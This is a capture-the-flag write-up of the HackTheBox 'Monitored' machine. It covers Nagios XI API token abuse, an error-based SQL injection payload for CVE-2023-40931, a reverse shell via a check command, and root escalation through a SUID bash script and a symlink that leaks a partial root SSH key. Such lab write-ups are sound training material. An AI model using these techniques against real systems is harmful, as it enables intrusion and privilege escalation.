HTB Monitored
HTB Monitored
HTB: Monitored
🏷 hackthebox htb-monitored
feroxbuster burp burp-repeater
ctf nmap nagios nagiosxi ldapsearch snmpwalk
cve-2023-40931 sqli sqlmap symbolic-link
nagios-api api-fuzz
Box Info
Name Monitored
Play on HackTheBox
OS Linux
Rated
Difficulty
Name Monitored
Play on HackTheBox
Radar Graph
04:26:35
05:10:33
Creators
Recon
nmap
nmap finds five open TCP ports, SSH (22), HTTP (80), LDAP (389), HTTPS
(443), and something unknown on 5667:
NTP will be useful if I need to sync clocks. I’ll want to enumerate SNMP
as well.
As far as the tech stack, I know it’s Nagios, and that the site is PHP-
based. I can’t find a version number, other than the copyright says
2008-2024. I won’t bother yet with a directory brute force, as it is public
software.
#
dn:
namingContexts: dc=monitored,dc=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
I can try to dump more, and it returns something, but not much:
# monitored.htb
dn: dc=monitored,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: monitored.htb
dc: monitored
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
It fails. nc doesn’t work either. It just hangs, and when I type anything,
it exits.
Shell as nagios
Validate Credentials
Using the creds from SNMP on the Nagios login shows a failure
message:
That suggests that these creds are good, but that the account has been
disabled.
After thinking this would be easily documented, I’ll give up and start
fuzzing.
Manual Fuzzing
I’ll get a request going in Burp Repeater and poke at the API manually a
bit. If I try /nagiosxi/api , it returns a 301 to /nagiosxi/api/ :
Feroxbuster
I’ll use feroxbuster to brute force the API. I’ll use the -m GET,POST
option to try both GET and POST requests, and -k to accept the invalid
TLS certificate. I’m starting at /nagiosxi/api , and it finds v1 quickly
(as well as includes ):
Finding Parameters
Access Nagios
apikey Fail
Following what I learned from the documentation above, I’ll try to visit
nagiosxi/api/v1/system/status with an apikey GET parameter.
Even on a fresh request of a new API key to make sure it’s not expired, it
returns invalid:
More Research
The first result is this 2020 forum post with this in the first answer:
It’s using token as the parameter that follows with the result. It also
uses a valid_min POST parameter along side the username and
password to set the validity time. Adding this does get the server to
return that it has a longer validity time, but it still seems to expire
quickly.
token Parameter
I’ll notice that the path in the successful token auth isn’t in the /api/
part of the server. Could this work on the main page? I’ll try visiting
/nagiosxi/?token=[token] :
Not only does it work, but it seems to validate my cookie so that I don’t
need to keep it in the URL to visit other pages.
Going to the account settings, I’ll find the API key for the svc user:
CVE-2023-40931 Background
Many of these are 7 months old, which means they were out before
Monitored was released, so I consider them in bounds for solving. CVE-
2023-40931 is a:
The team at Output24 that found this vuln (and three others)
documented a bit more about them in this post:
SQLI POC
I’ll try to build the same request described here. I always try to remove
unnecessary headers, leaving this request:
sqlmap
Typically I like to show manually doing the injection, but the database
here is large, so I’ll go right to sqlmap . For some reason this was a bit
tricky to get working with sqlmap . What eventually works for me is
building the command based on the advisory:
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER
Payload: id=3 OR (SELECT 7131 FROM(SELECT COUNT(*),CONCAT
Database Enumeration
From here I can enumerate the database. There are two DBs:
oxdf@hacky$ sqlmap -u "https://nagios.monitored.htb/nagiosxi/
...[snip]...
available databases [2]:
[*] information_schema
[*] nagiosxi
...[snip]...
There’s two users, svc and admin. Neither hash cracks in hashcat with
rockyou.txt . But there is an API key for each user as well.
I’ll go back to the original API example from the PDF above, and with
admin’s API key it works!
I’ll go back to the API and fuzz it some more, this time passing the api
token. The webserver is pretty slow, so I’m going to use a smaller API
focused wordlist:
oxdf@hacky$ feroxbuster -u https://nagios.monitored.htb/nagio
Unlike api and v1 the redirected to api/ and v1/ , here endpoints
that are paths but not specific endpoints return 200. For example,
system :
I don’t find anything in user or User , but in system , I’ll find a couple
interesting looking endpoints:
oxdf@hacky$ feroxbuster -u https://nagios.monitored.htb/nagio
command
User
I can create a new user, but how does that help advance my access?
Searching for this endpoint returns a very old exploit:
This exploit won’t work here, but it does show using this endpoint with
the following data:
I don’t yet have admin access to the site, just the API, so I’ll try to create
an admin user I can authenticate as.
The user is created. I’ll try logging into the site. It returns a License
Agreement:
Shell
Enumeration
Execution
There’s nothing really to run the command here. Back on the Core
Config page, I’ll go to “Hosts”:
There’s a “Check command” dropdown, which I’ll set to “0xdf shell”, and
now a “Run Check Command” button appears:
I’ll click it (and the next button in the popup), and it hangs, but there’s a
shell at nc :
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.248 53976
bash: cannot set terminal process group (61550): Inappropriat
bash: no job control in this shell
nagios@monitored:~$
Shell as root
Enumeration
sudo
sudo -l shows that the nagios user has 21 commands they can run as
root:
nagios@monitored:~$ sudo -l
Matching Defaults entries for nagios on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/
User nagios may run the following commands on localhost:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/components/autodiscover_n
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/migrate/migrate.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/g
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_l
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timez
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_servi
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_c
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh
The first 11 commands are from /etc/init.d for the nagios and
npcd binaries. Neither of these binaries are present on Monitored:
nagios@monitored:~$ ls /etc/init.d/
anacron cron networking shelli
apache2 dbus ntp slapd
apache-htcacheclean exim4 open-vm-tools snmpd
apparmor hwclock.sh postgresql snmptr
auditd keyboard-setup.sh procps snmptt
bluetooth kmod rsync ssh
console-setup.sh mariadb rsyslog sudo
Next I’ll review each script and think about ways I might abuse it. I
suspect there are many ways to abuse these scripts to get execution as
root. I’ll show two:
intended
Shell as nagios
unintended
Shell as root
Nagios Service
manage_services.sh
action=$1
Permissions
Script like LinPEAS will check these services for dangerous permissions,
but it’s more fun to do it on my own. I’ll start a bash loop to check for
all these services:
There are six installed. I’ll loop those into a command that reads the
service file, grep for any line with Exec , and then get the binary called
there. Then I’ll run ls -l on that binary:
The top two are interesting! They are both owned by the nagios user!
Execute
#!/bin/bash
cp /bin/bash /tmp/0xdf
chown root:root /tmp/0xdf
chmod 6777 /tmp/0xdf
I’ll copy that to nagios , and set the permissions so that it’s executable:
nagios@monitored:/usr/local/nagios/bin$ /tmp/0xdf -p
0xdf-5.1#
getprofile.sh
Understanding the Script
# GRAB THE ID
folder=$1
if [ "$folder" == "" ]; then
echo "You must enter a folder name/id to generate a prof
echo "Example: ./getprofile.sh <id>"
exit 1
fi
The rest of the script is running tail on various files and saving the
output in the new folder structure. For example:
echo "Creating eventman.txt..."
tail -n500 /usr/local/nagiosxi/var/eventman.log > "/usr/loca
I’ll use grep to look at all the files that are passed to tail :
Almost all of these are in /var/log , where the nagios can’t write. Still,
the last one is in the /usr/local/nagiosxi directory. The section of
code looks like:
At the end, it puts all the collected files into a Zip archive:
Abusing Symlink
nagios@monitored:~$ ls -l /usr/local/nagiosxi/tmp/phpmailer.l
-rw-r--r-- 1 nagios nagios 0 Nov 10 15:14 /usr/local/nagiosxi
That means I can modify it. The existing it empty. I’ll overwrite it with a
symlink:
nagios@monitored:/usr/local/nagiosxi/var/components$ ls
auditlog.log capacityplanning.log profile profile.zip
It has 61 files:
nagios@monitored:/usr/local/nagiosxi/var/components$ unzip -l
Archive: profile.zip
Length Date Time Name
--------- ---------- ----- ----
0 2024-05-09 08:57 profile-1715259437/
8761 2024-05-09 08:57 profile-1715259437/config.inc.p
159185 2024-05-09 08:57 profile-1715259437/xi_usermeta.
75 2024-05-09 08:57 profile-1715259437/iptables.txt
19818 2024-05-09 08:57 profile-1715259437/top.txt
825 2024-05-09 08:57 profile-1715259437/ip_addr.txt
29365 2024-05-09 08:57 profile-1715259437/1715254696.t
779 2024-05-09 08:57 profile-1715259437/filesystem.t
nagios@monitored:/usr/local/nagiosxi/var/components$ unzip -p
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAA
NhAAAAAwEAAQAAAYEAnZYnlG22OdnxaaK98DJMc9isuSgg9wtjC0r1iTzlSRV
FSINj1byqeOkrieC8Ftrte+9eTrvfk7Kpa8WH0S0LsotASTXjj4QCuOcmgq9I
...[snip]...
CNvArnlhyB8ZevAAAADnJvb3RAbW9uaXRvcmVkAQIDBA==
-----END OPENSSH PRIVATE KEY-----
SSH
0xdf
Buy me a coffee